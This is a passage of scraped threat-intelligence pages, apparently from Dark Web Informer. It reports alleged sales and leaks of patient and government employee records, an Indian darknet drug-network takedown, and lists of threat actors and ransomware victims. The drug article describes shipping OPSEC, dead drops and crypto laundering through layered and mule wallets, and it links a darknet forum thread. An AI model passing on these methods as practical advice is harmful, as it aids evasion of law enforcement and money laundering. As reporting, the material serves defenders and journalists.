[darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Alleged Sale of 1.8 Million Patient Records From Maple Respiratory Colombia Including Full Medical History URL: https://darkwebinformer.com/alleged-sale-of-1-8-million-patient-records-from-maple-respiratory-colombia-including-full-medical-history/ Last updated: 2026-03-10T19:42:04.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Sale of 1.8 Million Patient Records From Maple Respiratory Colombia Including Full Medical History March 10, 2026 - 7:28:33 PM UTC ![Colombia](https://flagcdn.com/20x15/co.png)Colombia Healthcare Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-10 19:28:33 UTC Threat Actor NyxarGroup Victim Country ![Colombia](https://flagcdn.com/20x15/co.png)Colombia Industry Healthcare Victim Organization Maple Respiratory Colombia Victim Site maplerespiratory.co Category Data Breach Severity Critical Network Open Web Total Records 1,800,000 ## Incident Overview A threat actor operating under the handle NyxarGroup is selling 1.8 million records from Maple Respiratory Colombia, a Colombian healthcare provider specializing in respiratory care. The data is being offered for $400 with escrow accepted, and a sample has been provided. Contact is handled via SimpleX messenger. The breach reportedly involves two separate databases. The first, labeled "users," contains patient contact and identity information including patient names, phone numbers, email addresses, identification numbers, and secondary phone numbers. The second database, labeled "citas" (appointments), contains what the actor describes as patients' entire medical history, with fields covering facility location (sede), treating professional, appointment dates, times, service types, patient names, phone numbers, email addresses, appointment types, and appointment statuses. The combination of patient identity data with full medical appointment histories makes this a particularly sensitive breach. The appointment records could reveal the types of respiratory conditions patients are being treated for, the frequency of their visits, and which specialists they see, all of which constitutes protected health information that could be used for targeted scams or discrimination. ## Compromised Data Categories Patient Names Phone Numbers (Primary & Secondary) Email Addresses Identification Numbers Full Medical Appointment History Treating Professionals Facility Locations Service Types Appointment Dates & Times Appointment Types & Statuses ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing 1.8 million Maple Respiratory Colombia patient records for sale](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/68788237114736402711.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/68788237114736402711.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Leak of Spanish Ministry of Finance Employee Data Including IDs, IBANs, and Personal Information URL: https://darkwebinformer.com/alleged-leak-of-spanish-ministry-of-finance-employee-data-including-ids-ibans-and-personal-information/ Last updated: 2026-03-10T19:53:53.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Leak of Spanish Ministry of Finance Employee Data Including IDs, IBANs, and Personal Information March 10, 2026 - 4:57:33 PM UTC ![Spain](https://flagcdn.com/20x15/es.png)Spain Government / Finance Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-10 16:57:33 UTC Threat Actor PoliceEspDoxedBF Victim Country ![Spain](https://flagcdn.com/20x15/es.png)Spain Industry Government / Finance Victim Organization Ministerio de Hacienda Victim Site hacienda.gob.es Category Data Leak Severity Critical Network Open Web Total Records Unknown ## Incident Overview The same threat actor behind the recent Agencia Tributaria (AEAT) employee leak, operating under the handle PoliceEspDoxedBF, has now uploaded a second dataset targeting Spain's Ministerio de Hacienda (Ministry of Finance). The actor claims this leak directly affects members of the ministry and contains a range of sensitive personal and financial information. The account has since been banned from the forum. According to the listing, the exposed data includes ID numbers, phone numbers, physical addresses, IBANs (bank account numbers), full names, and email addresses belonging to ministry employees. Redacted samples posted in the listing show structured records with multiple data points per individual. This represents a significant escalation from the AEAT leak, as the inclusion of IBANs and ID numbers alongside personal contact details creates a much higher risk for identity theft and financial fraud targeting government workers. A direct download link is provided along with the actor's official Telegram channel. The data is being offered for free. This is the second Spanish government agency targeted by this actor within days, suggesting either access to a shared government data source or a coordinated campaign against Spanish public administration employees. ## Compromised Data Categories ID Numbers Full Names Phone Numbers Physical Addresses IBANs (Bank Account Numbers) Email Addresses ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Spanish Ministry of Finance employee data leak with IDs, IBANs, and personal information](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/39750060265451901295.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/39750060265451901295.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Sale of 150,000 Patient Records From US Clinic Including SSNs, Diagnoses, and Medications URL: https://darkwebinformer.com/alleged-sale-of-150-000-patient-records-from-us-clinic-including-ssns-diagnoses-and-medications/ Last updated: 2026-03-10T19:54:00.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Sale of 150,000 Patient Records From US Clinic Including SSNs, Diagnoses, and Medications March 10, 2026 - 3:33:10 PM UTC ![USA](https://flagcdn.com/20x15/us.png)USA Healthcare Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-10 15:33:10 UTC Threat Actor Heiz Victim Country ![USA](https://flagcdn.com/20x15/us.png)USA Industry Healthcare Victim Organization Unnamed US Clinic Victim Site Unknown Category Data Breach Severity Critical Network Deep Web Total Records 150,000+ ## Incident Overview A threat actor using the handle Heiz is selling a database containing over 150,000 patient records allegedly extracted from a US medical clinic. The data is described as up-to-date and personally extracted by the actor, stored in a 460MB SQLite database file. The listing appeared on a Russian-language hacking forum in the Access section for FTP, shells, roots, SQL injections, databases, and dedicated servers. The dataset reportedly contains highly sensitive patient information including social security numbers, dates of birth, full names, phone numbers, email addresses, medical diagnoses, prescribed medications, and treating physician details. The actor is offering the data in full or in parts, with options for full patient files or leads consisting of files plus contact information. Pricing starts at $10 per record, with the sale restricted to a single buyer and no reselling or public posting allowed. The threat actor emphasizes that the database was extracted personally and has only been touched by them, positioning this as a fresh, exclusive dataset. They also express interest in cooperating with developers, suggesting potential plans to further monetize or exploit the data. ## Compromised Data Categories Social Security Numbers (SSNs) Dates of Birth Full Names Phone Numbers Email Addresses Medical Diagnoses Medications Physician Information ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing 150,000 US clinic patient records for sale including SSNs, diagnoses, and medications](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/894509257089235780927098533.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/894509257089235780927098533.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### India's NCB Dismantles "Team Kalki" Darknet Drug Network After Seizing ₹5 Crore ($580,000 USD) in Narcotics URL: https://darkwebinformer.com/indias-ncb-dismantles-team-kalki-darknet-drug-network-after-seizing-5-crore-580-000-usd-in-narcotics/ Last updated: 2026-03-09T23:04:47.000Z India's Narcotics Control Bureau (NCB) has taken down a pan-India darknet drug distribution network operating under the name "Team Kalki," [arresting two individuals](https://www.thehindu.com/news/national/ncb-busts-pan-india-darknet-drug-network-called-team-kalki/article70718910.ece) and seizing narcotics valued at an estimated ₹5 crore (\~$580,000 USD) on the international market. The operation, conducted in New Delhi following three months of intelligence gathering, resulted in the seizure of 2,338 LSD blotters, 160 MDMA (Ecstasy) pills (\~77.5g), 73.6 grams of charas (cannabis resin), 3.6 grams of amphetamine, and 3.6 kilograms of liquid MDMA. The drugs were recovered from 13 domestically intercepted parcels and two international consignments originating from the Netherlands. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/237895678962358792367981.webp) ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/187293654982765987236589723.webp) ## The Operators The network was run by **Anurag Thakur** and his associate **Vikas Rathi**, both repeat offenders previously arrested under India's Narcotic Drugs and Psychotropic Substances (NDPS) Act. Rathi had served time in Tihar Jail for a charas trafficking case filed by the Delhi Police Special Cell, while Thakur was imprisoned for methamphetamine trafficking by the Delhi Police Crime Branch. The two met while incarcerated at Tihar and later built the Team Kalki operation together after their release. ## Darknet Operations & OPSEC Team Kalki initially established itself on the dark web forum **Dread**, where it maintained a four-star vendor rating, indicating a high volume of successful transactions. The operation later expanded to the encrypted messaging platform **Session** for order fulfillment and customer communication. The network sourced LSD and MDMA from international darknet vendors based in the **Netherlands, Poland, and Germany**. Orders from buyers across India were received via Dread and Session, with fulfillment handled by packaging and dispatching parcels through India Post's Speed Post service and various private courier companies. Notably, a different courier office or booking account was used for each individual shipment as an anti-detection measure. In certain areas of Delhi, the network employed a **"dead drop" delivery method,** placing drug parcels at pre-determined locations rather than handing them directly to buyers. Customers were then notified of the pickup location. This technique was reserved for repeat customers with a history of multiple prior orders. The NCB suspects the network dispatched **more than 1,000 parcels across India** since January 2025\. Some consignments were intercepted by law enforcement before delivery in Delhi, Tamil Nadu, Telangana, Kerala, and Karnataka. ## Cryptocurrency Laundering Payments were accepted exclusively in cryptocurrency, primarily **Monero (XMR)** and **USDT (Tether)**, using unhosted wallets. For USDT transactions, temporary wallets were dynamically created for each payment, with funds immediately funneled through multiple layers of intermediary wallets to beneficiary wallets in an attempt to obscure the transaction trail. Proceeds were routed through intermediary wallets with conversion fees of up to 10%, then converted to USDT and stored in **cold wallets**. In some cases, **mule wallets with KYC-compliant accounts** were used to funnel cryptocurrency proceeds into the formal banking system, a classic integration technique for laundering digital currency. Multiple electronic devices and a cryptocurrency wallet linked to the operation were recovered during the arrests. ## Broader Context This operation is part of the NCB's sustained crackdown on darknet-enabled drug trafficking in India. Previous operations include **Operation Ketamelon (2025)**, which dismantled India's only Level-4 darknet vendor "Ketamelon" operating out of Kerala, and **Operation Zambada (2023)**, which targeted international darknet market supply chains. The NCB says its investigation is ongoing, with efforts focused on identifying additional associates, tracing financial transactions, and uncovering the international supply chain connected to Team Kalki. ## Dark Web Informer Note You can follow the threads on Dread: https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad\[.\]onion/d/DarknetMarketsIndia ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/1.png) ### Daily Dose of Dark Web Informer - March 9th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-9th-2026/ Last updated: 2026-03-09T22:34:29.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [Personal Data of Agencia Tributaria (AEAT) Employees Allegedly Leaked Including Staff of All Ranks and Ages](https://darkwebinformer.com/personal-data-of-agencia-tributaria-aeat-employees-allegedly-leaked-including-staff-of-all-ranks-and-ages/) FREE ❗️ [Yummy Rides Venezuela Driver Database Leaked With 30,000 Photos and Full Names](https://darkwebinformer.com/yummy-rides-venezuela-driver-database-leaked-with-30000-photos-and-full-names/) FREE 💡 [Ransomware Attack Update - March 9th, 2026](https://darkwebinformer.com/ransomware-attack-update-march-9th-2026/) FREE 💡 [Threat Attack Update - March 9th, 2026](https://darkwebinformer.com/threat-attack-update-march-9th-2026/) FREE X/Twitter Updates ❗️ [The LeakBase domain that was seized late last week, has a new domain.](https://x.com/DarkWebInformer/status/2030799793069396055?s=20) ❗️ [A threat actor claims to have breached Infutor, a leading consumer identity management and resolution company that helps brands identify, verify, and understand their customers in real-time.](https://x.com/DarkWebInformer/status/2030993951381987402?s=20) ❗️ [Chucky showing proof of life.](https://x.com/DarkWebInformer/status/2030995759772963062?s=20) ❗️ [Arion Kurtaj, the LAPSUS$ hacker who breached Rockstar Games and leaked GTA VI, was able to get a phone in prison and post some pictures.](https://x.com/DarkWebInformer/status/2031000608963260499?s=20) ❗️ [A threat actor is advertising "MBoster Traffic V4," an automated international traffic and SEO manipulation tool with two execution modes.](https://x.com/DarkWebInformer/status/2031011448264995029?s=20) ❗️ [A threat actor is allegedly selling a combination of 36 Israeli databases totaling 9,200,000 rows (3GB decompressed) across 33 txt/csv files.](https://x.com/DarkWebInformer/status/2031014499839270945?s=20) ❗️ [CVE-2026-20127: Cisco SD-WAN Zero-Day CVE-2026-20127 Exploited Since 2023 for Admin Access.](https://x.com/DarkWebInformer/status/2031029610742198675?s=20) ❗️ [BD Anonymous targeted the website of Jordan's National Cyber Security Center](https://x.com/DarkWebInformer/status/2031032886929834160?s=20) 💡 [The Man Who Outsmarted the NSA](https://x.com/DarkWebInformer/status/2031045339952660935?s=20) ❗️ [ShinyHunters is warning several hundred companies to pay up or have data leaked from the Salesforce Aura Campaign](https://x.com/DarkWebInformer/status/2031054614733201823?s=20) ❗️ [A threat actor from the Nyxar group is allegedly selling 750K records of Colombian citizens from INCODOL (Instituto Colombiano del Dolor), a Colombian pain management healthcare institution.](https://x.com/DarkWebInformer/status/2031061816324010070?s=20) ❗️ [A threat actor is allegedly selling a database breach from Sunrise, Switzerland's second-largest telecommunications provider, offering comprehensive fixed network access and mobile network coverage across the country.](https://x.com/DarkWebInformer/status/2031068864709107952?s=20) ❗️ [A threat actor claims to have found the hotel management system of Hotel Lucerna Tijuana, a 5-star hotel in Mexico, fully exposed with no authentication required.](https://x.com/DarkWebInformer/status/2031071390611177490?s=20) 💡 [Still working through some bugs & false positives, but this will likely be the main screen you see when you launch the script. I tried to make this version simple to use even for the n00bies. Readme on GitHub will be fully updated on release. Will be available early next week.](https://x.com/DarkWebInformer/status/2031073965267980371?s=20) ❗️ [DarkForums has two backup domains in case their main one goes down...](https://x.com/DarkWebInformer/status/2031077376923214198?s=20) ❗️ [A threat actor is allegedly selling the database of MagicSlides.app, an AI-powered presentation generation platform, containing 2,385,847 unique emails.](https://x.com/DarkWebInformer/status/2031085139305050318?s=20) 💡 [The GitHub Advisories that is currently in the Early Access Program for Elite subscribers got the following update today.](https://x.com/DarkWebInformer/status/2031091586126282832?s=20) 💡 [Common Ports](https://x.com/DarkWebInformer/status/2031096336230056438?s=20) 💡 [How many zero-days will be patched in tomorrow's Microsoft Patch Tuesday?](https://x.com/DarkWebInformer/status/2031106797180743967?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Threat Attack Update - March 9th, 2026 URL: https://darkwebinformer.com/threat-attack-update-march-9th-2026/ Last updated: 2026-03-09T22:03:29.000Z ### Threat Feed Plus Real-time threat intelligence feed for Plus subscribers. [View Feed](https://darkwebinformer.com/threat-feed-2-0-plus-subscribers-only) ### Threat Feed Pro/Elite Advanced threat intelligence feed for Pro and Elite subscribers. [View Feed](https://darkwebinformer.com/threat-feed-2-0-pro-and-elite-subscribers-only) ### API Access Authenticated access to threat intelligence, ransomware data, IOC history, and exports. [View API](https://darkwebinformer.com/api-details/) ### Socials Follow Dark Web Informer across all official platforms. [Follow](https://darkwebinformer.com/socials) ### Donations Support Dark Web Informer with cryptocurrency donations. [Donate](https://darkwebinformer.com/donations) --- Threat Recap # March 9th, 2026 12:01 AM UTC 9:56 PM UTC expand all collapse all 253 Total Claims 31 Ransomware 36 Countries 👤 Threat Actors 83 - INDRAMAYU CHAOS SYSTEM98 - NoName057(16)14 - Hider\_Nex12 - L4663R666H05T6 - akira6 - INC RANSOM4 - Qilin4 - Armenian code4 - Blue Shadow4 - Team The Flash DDoS BOX4 - Ashborn4 - Hax.or4 - LOCKBIT 5.03 - GenesisGroup3 - Secp03 - 404 CREW CYBER TEAM2 - ShinyHunters2 - Free Hacker2 - XyzStresserr2 - manofworld2 - VinzXmodz2 - MrLevstcc1337 - STRESSER2 - Rakyat Digital Crew2 - Akatsuki cyber team (official)2 - Handala Hack2 - BD Anonymous2 - NightSpire2 - MORNING STAR1 - William Black1 - INTERLOCK1 - Cardinal1 - DieNet1 - hirohero891 - The1F1 - rythem1 - macaroni1 - Niphra1 - p1radox1 - NyxarGroup1 - CyznetAdel1 - Meduza Locker1 - Payouts King1 - Anonymous1 - bytetobreach1 - Jon12341 - Straightonumberone1 - faqwe7891 - jinkusu011 - WOC1 - savel9871 - corptoday1 - YanXploit1 - SnowSoul1 - SYLHET GANG-SG1 - sxxone1 - CRYPTO241 - The Gentlemen1 - XYZ1 - HexDex1 - SOLO APT by Kafir1 - Gunra1 - Shadow ClawZ 4041 - vibecodelegend1 - Team Bangladesh cyber squad1 - THE GARUDA EYE1 - MEDUSA1 - HighRisk1 - Yrmnxcro1 - Matteo1 - M4nifest1 - keta1 - GordonFreeman1 - Z-PENTEST ALLIANCE1 - smokethislist1 - BlackMaskers Army1 - THE GHOSTS IN THE MACHINE1 - Cyber ​​Islamic resistance1 - NOTRASEC TEAM1 - PoliceEspDoxedBF1 - MRX10-SY1 - 313 Team1 - Spirigatito1 - Cuatro1 ⚡ Attack Categories 7 Data Breach142 DDoS Attack44 Ransomware31 Initial Access17 Defacement13 Alert4 Malware2 🌍 Victim Countries 36 - Indonesia92 - Israel39 - USA30 - Unknown12 - France9 - Bahrain9 - UAE8 - Thailand5 - Cyprus5 - Azerbaijan4 - UK3 - Mexico3 - Switzerland3 - China3 - Vietnam2 - Morocco2 - Brazil2 - Spain2 - Tunisia2 - Saudi Arabia2 - Chile1 - New Zealand1 - Finland1 - Colombia1 - Iran1 - Jordan1 - Mongolia1 - Czech Republic1 - Pakistan1 - Italy1 - Canada1 - South Korea1 - Bangladesh1 - Egypt1 - Portugal1 - Venezuela1 🏭 Victim Industries 61 - Government Administration86 - Unknown36 - Education15 - Government & Public Sector12 - Network & Telecommunications8 - E-commerce & Online Stores8 - Transportation & Logistics5 - Food & Beverages4 - Financial Services4 - Gambling & Casinos3 - Hospital & Health Care3 - Defense & Space3 - Consumer Services3 - Law Practice & Law Firms2 - Medical Practice2 - Building and construction2 - Insurance2 - Software Development2 - Hospitality & Tourism2 - Broadcast Media2 - Furniture2 - Real Estate2 - Higher Education/Acadamia2 - Political Organization2 - Banking & Mortgage2 - Social Media & Online Social Networking2 - Government Relations2 - Research Industry2 - Mechanical or Industrial Engineering1 - Online Publishing1 - Recreational Facilities & Services1 - Software1 - Newspapers & Journalism1 - Law Enforcement1 - Judiciary1 - Veterinary1 - Airlines & Aviation1 - Entertainment & Movie Production1 - Electrical & Electronic Manufacturing1 - Accounting1 - Environmental Services1 - Facilities Services1 - Investment Management, Hedge Fund & Private Equity1 - Information Services1 - Media Production1 - Healthcare & Pharmaceuticals1 - Marketing, Advertising & Sales1 - Professional Services1 - Computer Hardware1 - Sports1 - Legal Services1 - Industrial Automation1 - Printing1 - Health & Fitness1 - Civil Engineering1 - International Trade & Development1 - Music1 - International Affairs1 - Plastics1 - Publishing Industry1 - Oil & Gas1 ### Ransomware Attack Update - March 9th, 2026 URL: https://darkwebinformer.com/ransomware-attack-update-march-9th-2026/ Last updated: 2026-03-09T21:44:27.000Z ### API Access Authenticated access to threat intelligence, ransomware data, IOC history, and exports. [View API](https://darkwebinformer.com/api-details/) ### Ransomware Feed Browse the latest ransomware victim claims, threat groups, and related activity. [View Feed](https://darkwebinformer.com/ransomware-feed) ### Socials Follow Dark Web Informer across all official platforms. [Follow](https://darkwebinformer.com/socials) ### Donations Support Dark Web Informer with cryptocurrency donations. [Donate](https://darkwebinformer.com/donations) --- 32 claims 9 groups 8 countries Ransomware Recap # March 9, 2026 12:01 AM – 11:59 PM UTC 32Claims 9Groups 8Countries 3-way tieMost Active Group Activity ✕ Count A–Z Expand Collapse \= country not specified No matches found. ### The Gentlemen 6 - eDevice - Nenplas - Kpropha - Sodimatel Fasteners - Cosmesia - Grupo San Jacinto ### Play 6 - Infinity Systems - Serrano Industries - Helen Kaminski - Byard F Brogan - Facilities USA - Southern Concrete Construction ### Akira 6 - Woodfines - Colliers International Idaho - WEDGE - Fiberglass Hawaii - Peninsular Electric Distributors - Hauri AG Staffelbach ### Qilin 4 - RWB Consulting Engineers - Pleiad Investment Advisors (Singapore brach) - McKenna Pro - Serviceplan Group (Korea branch) ### INC Ransom 3 - altaortho.com - tupeloeye.com - arbd.com ### Nightspire 3 - T\*\*n\*e\*\*l S.A. C\*\*\*t\*\*c\*\*\*a - C\*T\* M\*\*al\*\*\*g\*e - T\*\*\*\*r \*\*\*\*t\* P\*\*p\*\*\*y \*\*\*r\*\*\*e\*\*\* \*\*f\*\*e ### ShinyHunters 2 - Vertex Inc. - Salesforce Aura Campaign ### Embargo 1 - nch.com ### Crypto24 1 - Comprehensive Orthopaedics and Musculoskeletal Care, LLC ### Yummy Rides Venezuela Driver Database Leaked With 30,000 Photos and Full Names URL: https://darkwebinformer.com/yummy-rides-venezuela-driver-database-leaked-with-30-000-photos-and-full-names/ Last updated: 2026-03-09T14:03:26.000Z Dark Web Informer - Cyber Threat Intelligence # Yummy Rides Venezuela Driver Database Leaked With 30,000 Photos and Full Names March 9, 2026 - 4:17:29 AM UTC ![Venezuela](https://flagcdn.com/20x15/ve.png)Venezuela Transportation / Ride-Hailing Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-09 04:17:29 UTC Threat Actor GordonFreeman Victim Country ![Venezuela](https://flagcdn.com/20x15/ve.png)Venezuela Industry Transportation / Ride-Hailing Victim Organization Yummy Rides Victim Site yummy.com.ve Category Data Leak Severity High Network Open Web Total Records \~30,000 ## Incident Overview A threat actor going by GordonFreeman claims to have compromised the Yummy Rides platform in Venezuela and leaked a database containing approximately 30,000 driver photos along with their full names. Yummy Rides is a Venezuelan ride-hailing and delivery service. The data has been made available as a completely free download with a direct link. The leaked data consists of driver profile images that are named with the drivers' full names, effectively tying each photograph to a real identity. Screenshots posted as proof show hundreds of thumbnail-sized ID-style photos of drivers, clearly demonstrating the scale of the exposure. This type of leak is particularly concerning as it provides both visual identification and real names of gig workers, potentially exposing them to targeted harassment, impersonation, or social engineering. The threat actor explicitly states they compromised the platform directly to obtain this data. ## Compromised Data Categories Driver Photos (\~30,000) Full Names ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Yummy Rides Venezuela driver database leak with 30,000 photos](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/99611671677565069166.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/99611671677565069166.png) [![Sample driver photos from Yummy Rides Venezuela database leak](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/99611671677565069167.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/99611671677565069167.png) [![Additional sample driver photos from Yummy Rides Venezuela database leak](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/99611671677565069168.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/99611671677565069168.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Personal Data of Agencia Tributaria (AEAT) Employees Allegedly Leaked Including Staff of All Ranks and Ages URL: https://darkwebinformer.com/personal-data-of-agencia-tributaria-aeat-employees-allegedly-leaked-including-staff-of-all-ranks-and-ages/ Last updated: 2026-03-09T13:48:10.000Z Dark Web Informer - Cyber Threat Intelligence # Personal Data of Agencia Tributaria (AEAT) Employees Allegedly Leaked Including Staff of All Ranks and Ages March 9, 2026 - 1:49:24 AM UTC ![Spain](https://flagcdn.com/20x15/es.png)Spain Government / Taxation Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-09 01:49:24 UTC Threat Actor PoliceEspDoxedBF Victim Country ![Spain](https://flagcdn.com/20x15/es.png)Spain Industry Government / Taxation Victim Organization Agencia Tributaria (AEAT) Victim Site agenciatributaria.es Category Data Leak Severity Critical Network Open Web Total Records Unknown ## Incident Overview A threat actor using the handle PoliceEspDoxedBF has uploaded the personal data of employees of the Agencia Tributaria (AEAT), Spain's national tax administration agency responsible for managing the country's tax system and customs. The actor claims the leak covers staff of all ranks and ages within the organization. The threat actor specifically notes that the exposed individuals are not public-facing employees and are not publicly known to work for the tax agency, meaning their privacy is enhanced and this leak effectively exposes their affiliation with AEAT for the first time. This type of doxing targeting government tax employees carries serious risks, as it could enable harassment, social engineering, or targeted attacks against individuals responsible for tax enforcement and auditing. Redacted samples were posted in the listing showing what appears to be structured personal data for multiple employees. ## Compromised Data Categories Employee Personal Data Staff Ranks Ages Government Agency Affiliation ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Agencia Tributaria employee personal data leaked](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/22569726173606040013.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/22569726173606040013.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Services URL: https://darkwebinformer.com/services/ Last updated: 2026-03-08T01:17:18.000Z _No content available._ ### Ransomware Notes URL: https://darkwebinformer.com/ransomware-notes/ Last updated: 2026-08-14T20:49:57.000Z _This post is for subscribers on the Pro and Elite tiers only._ ### Ransomware Negotiations URL: https://darkwebinformer.com/ransomware-negotiations/ Last updated: 2026-08-06T16:25:46.000Z _This post is for subscribers on the Pro and Elite tiers only._ ### Daily Dose of Dark Web Informer - March 6th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-6th-2026/ Last updated: 2026-03-06T22:53:02.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, 